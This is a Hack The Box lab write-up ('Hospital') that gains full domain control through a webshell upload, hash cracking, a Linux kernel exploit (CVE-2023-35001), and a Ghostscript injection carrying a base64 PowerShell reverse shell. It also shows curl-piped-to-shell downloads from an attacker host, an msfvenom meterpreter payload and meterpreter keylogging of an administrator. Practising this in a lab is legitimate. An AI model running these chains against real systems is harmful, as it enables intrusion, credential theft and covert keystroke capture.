Hospital

Recon

nmap_scan.log

HTTP (8080)

Writeup-1.png

Creds: letmein:letmein

When logged in we get an upload form:

Writeup-2.png

We can fuzz the extension to see which one is valid or not.

Wordlist = /usr/share/seclists/Discovery/Web-Content/web-extensions.txt

To add string matching go to Settings, Grep Match, add string and include headers.

Writeup-3.png

Not sure why, but shell.phar wasn't getting uploaded. Changing the name helped.

Webshell: http://hospital.htb:8080/uploads/letmein.phar

Writeup-4.png

www-data@webserver:…/www/html# cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
 
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' -e 'SHOW DATABASES;'
Database
hospital
information_schema
mysql
performance_schema
sys

www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SHOW TABLES;'
Tables_in_hospital
users

www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SELECT * FROM users;'
id	username	password	created_at
1	admin	$2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2	2023-09-21 14:46:04
2	patient	$2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO	2023-09-21 15:35:11
3	letmein	$2y$10$PW.UkTvD9dHa4US0a6Ke5.0uAiwRZTT5mbH7ixP3NyKoByFk/W4su	2024-11-26 02:53:45

Bruteforce admin password

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (?)
1g 0:00:00:00 DONE (2024-11-26 00:20) 1.915g/s 137.9p/s 137.9c/s 137.9C/s 123456..666666
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Creds don't work anywhere we know...

This is a Windows machine, but clearly we are inside Linux container. Linpeas didn't give anything useful, box is somewhat old so we can assume there's kernel exploit of some sort.

www-data@webserver:/var/www/html/uploads$ curl 10.10.14.99/lp.sh|sh|tee /tmp/lp.log
							  ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.19.0-35-generic (buildd@lcy02-amd64-014) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.2.0-3ubuntu1) 12.2.0, GNU ld (GNU Binutils for Ubuntu) 2.39) #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023
Distributor ID: Ubuntu
Description:    Ubuntu 23.04
Release:        23.04
Codename:       lunar
...
                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/go
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

CVE-2023-35001: Exploit used at pwn2own Vancouver 2023 on Ubuntu desktop. The exploit supports the kernel version available at the beginning of the event (5.19.0-35).

For whatever reason there's golang install on machine and we can leverage that to use exploit.

└─$ git clone https://github.com/synacktiv/CVE-2023-35001.git
└─$ cd CVE-2023-35001
└─$ make
---
www-data@webserver:/tmp$ cd `mktemp -d`
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ curl 10.10.14.99/CVE-2023-35001/lpe.zip -O
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ busybox unzip lpe.zip
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ chmod +x ./*
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ ./exploit
./exploit
[+] Using config: 5.19.0-35-generic
[+] Recovering module base
[+] Module base: 0xffffffffc0679000
[+] Recovering kernel base
[+] Kernel base: 0xffffffffaa000000
[+] Got root !!!
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/shadow | grep ':\$'
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

Note: CVE-2023-2640-CVE-2023-32629 GameOver(lay) exploit should also be valid for this kernel.

The only valid hash should be drwilliams

➜ .\hashcat.exe --show .\hashes
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
➜ .\hashcat.exe -m 1800 -a 0 .\hashes .\rockyou.txt
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#

HTTPs (443)

There's HTTPs server which is serving RoundCube webmail.

Writeup.png

Creds: drwilliams:qwe123!@#

Using SSH credentials we can log into webmail. New user drbrown.

Writeup-5.png

About shows version Roundcube Webmail 1.6.4: CVE-2023-43770-POC XSS vulnerability. Can't do much with XSS, so probably not useful...

CVE-2023-36664

drbrown is waiting for GhostScript, CVE-2023-36664-Ghostscript-command-injection could be valid exploit considering the dates.

└─$ git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git
└─$ cd CVE-2023-36664-Ghostscript-command-injection
└─$ py CVE_2023_36664_exploit.py -f file.eps -p 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -i

Sending the email directly to drbrown doesn't get triggered, but replying to his message gives back connection.

Writeup-6.png

└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.229.189:8166.
whoami /all
User Name        SID
================ ==============================================
hospital\drbrown S-1-5-21-4208260710-2273545631-1523135639-1601

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users               Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\drbrown.HOSPITAL\Documents> cat ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"

WinRM

Creds: drbrown:chr!$br0wn

└─$ netexec smb 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
SMB         10.129.229.189  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.189  445    DC               [+] hospital.htb\drbrown:chr!$br0wn
└─$ netexec winrm 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
WINRM       10.129.229.189  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:hospital.htb)
WINRM       10.129.229.189  5985   DC               [+] hospital.htb\drbrown:chr!$br0wn (Pwn3d!)
└─$ evil-winrm -i hospital.htb -u 'drbrown' -p 'chr!$br0wn'
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Documents>

User.txt

*Evil-WinRM* PS C:\Users\drbrown.HOSPITls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\drbrown.HOSPITAL\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/25/2024   6:42 PM             34 user.txt

793506c3c5106406a122b94fec45c2d3

Privilege Escalation

Nothing useful from bloodhound

└─$ bloodhound-python -ns 10.129.229.189 -d hospital.htb -u 'drbrown' -p 'chr!$br0wn' -c all --zip -op drbrown

Enumerate with winpeas

*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> iwr 10.10.14.99/wp.exe -outfile wp.exe
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> .\wp.exe | tee-object -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables
  [X] Exception: Unable to cast object of type 'System.Int32' to type 'System.String'.
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files\Python312\Scripts\;C:\Program Files\Python312\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\gs\gs10.01.1\bin;C:\Program Files\PuTTY\;C:\Program Files\dotnet\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101
...
ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
  [X] Exception: Invalid namespace
    No AV was detected!!
    Not Found
...
ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.
...
ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
  [X] Exception: Access denied
    Apache2.4(Apache Software Foundation - Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Autoload
    Possible DLL Hijacking in binary folder: C:\xampp\apache\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
    Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
...
ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
     File Permissions "C:\Users\drbrown.HOSPITAL\Music\wp.exe": drbrown [AllAccess]
     File Permissions "C:\Users\drbrown.HOSPITAL\Documents\ghostscript.bat": drbrown [AllAccess]
     File Permissions "C:\Users\drbrown.HOSPITAL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\connect.bat": drbrown [AllAccess]
     File Permissions "C:\Users\drbrown.HOSPITAL\.cache\selenium\IEDriverServer\win32\4.14.0\IEDriverServer.exe": drbrown [AllAccess]
...
ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
    SessID    pSessionName   pUserName      pDomainName              State     SourceIP
    1         Console        drbrown        HOSPITAL                 Active

Path 1

We basically have write permissions on XAMPP, usually due to misconfiguration it's not protected and it's also running as NT SYSTEM...

*Evil-WinRM* PS C:\xampp\htdocs> curl 10.10.14.99/shell.php -outfile C:\xampp\htdocs\shell.php

Writeup-7.png

Path 2 (Failed)

Because of UAC policy RunasCs should have worked, but it failed... Interesting.

.\rc.exe drbrown 'chr!$br0wn' 'whoami /all' -b -l 5

Path 3

If we RDP we can observe the automated script logging into the webmail, probably to emulate the user.

Creds: Administrator:Th3B3stH0sp1t4l9786!

Writeup-8.png

Path 4

└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
└─$ msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
---
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> upload www/rev.exe
Info: Uploading /home/woyag/Desktop/Rooms/Hospital/www/rev.exe to C:\Users\drbrown.HOSPITAL\Music\rev.exe
---

https://www.offsec.com/metasploit-unleashed/keylogging/

When you want to listen for keystrokes either you attach yourself to process or explorer, generally explorer would be better idea.

meterpreter > ps

Process List
============

 PID   PPID  Name                                       Arch  Session  User              Path
 ---   ----  ----                                       ----  -------  ----              ----
 6600  6680  explorer.exe                               x64   1        HOSPITAL\drbrown  C:\Windows\explorer.exe
meterpreter > migrate 2668
[*] Migrating from 760 to 2668...
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
administratorTh3B3stH0s

meterpreter > keyscan_dump
Dumping captured keystrokes...
p1t4l97861AdministratorTh3B3stH0sp1t4l9786!

└─$ evil-winrm -i hospital.htb -u 'Administrator' -p 'Th3B3stH0sp1t4l9786!'

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/26/2024   5:11 PM             34 root.txt

ce1ed92833a67c42e95b78194c9c6941